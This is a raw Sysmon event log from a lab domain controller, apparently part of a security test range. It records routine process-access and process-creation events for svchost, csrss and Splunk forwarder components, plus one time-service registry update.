13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.844{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:55:02.671{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0x84c037d7) 10341000x80000000000000009379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.639{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.654{59A5CD1D-9361-6005-D104-00000000A301}42364396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 